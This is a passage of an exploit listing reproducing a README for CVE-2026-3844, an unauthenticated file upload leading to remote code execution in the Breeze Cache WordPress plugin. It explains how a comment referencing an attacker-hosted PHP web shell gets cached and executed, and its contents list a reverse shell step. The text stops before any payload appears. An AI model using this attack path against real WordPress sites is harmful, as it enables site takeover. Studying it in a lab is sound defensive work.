Exploit for CVE-2026-3844

Name: Exploit for CVE-2026-3844
Rating: 5 (12 reviews)
2026-06-06 | CVSS 9.8
## https://sploitus.com/exploit?id=0CDEBDFC-50F8-59DC-B9F7-A7A24E92F353
# CVE-2026-3844 – Breeze Cache WordPress Plugin Unauthenticated RCE

[![CVE-2026-3844](https://img.shields.io/badge/CVE-2026--3844-critical?style=flat-square)](https://vulners.com/cve/CVE-2026-3844)
[![CVSS](https://img.shields.io/badge/CVSS-9.8%20(Critical)-red?style=flat-square)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
[![WordPress](https://img.shields.io/badge/WordPress-6.x-blue?style=flat-square)](https://wordpress.org)
[![License](https://img.shields.io/badge/License-MIT-green?style=flat-square)](LICENSE)

**CVE-2026-3844** is a critical unauthenticated arbitrary file upload vulnerability in the **Breeze Cache** WordPress plugin (versions ≤ 2.4.4). An attacker can post a comment containing a malicious `` tag pointing to a PHP web shell. The plugin fetches and stores the file in a publicly accessible cache directory (`/wp-content/cache/breeze-extra/gravatars/`), leading to **Remote Code Execution (RCE)**.

This repository provides a **fully functional Docker lab** and a **manual exploitation guide** to reproduce the vulnerability safely.

---

## 📋 Table of Contents

- [Vulnerability Overview](#-vulnerability-overview)
- [Lab Environment (Docker)](#-lab-environment-docker)
- [Exploitation Steps](#-exploitation-steps)
  - [1. Host the Payload](#1-host-the-payload)
  - [2. Post Malicious Comment](#2-post-malicious-comment)
  - [3. Verify Upload & Execute Commands](#3-verify-upload--execute-commands)
  - [4. Reverse Shell (Optional)](#4-reverse-shell-optional)
- [Mitigation & Remediation](#-mitigation--remediation)
- [Detection](#-detection)
- [References](#-references)
- [Disclaimer](#-disclaimer)

---

## 🧠 Vulnerability Overview

| Property               | Details |
|------------------------|---------|
| **CVE ID**             | CVE-2026-3844 |
| **CVSS Score**         | 9.8 (Critical) – AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Attack Vector**      | Network – unauthenticated HTTP POST to `/wp-comments-post.php` |
| **Affected Software**  | WordPress Breeze Cache plugin ≤ 2.4.4 |
| **Patched Version**    | Breeze Cache ≥ 2.4.5 |
| **Root Cause**         | Missing file type validation in `fetch_gravatar_from_remote()` (CWE-434) |
| **Prerequisite**       | "Host Files Locally – Gravatars" option **must be enabled** in Breeze settings |

### How It Works

1. The attacker hosts a PHP web shell (e.g., `shell.php`) on a public or local HTTP server.
2. The attacker posts a comment on any WordPress post that has comments open, with the following payload:
   ```html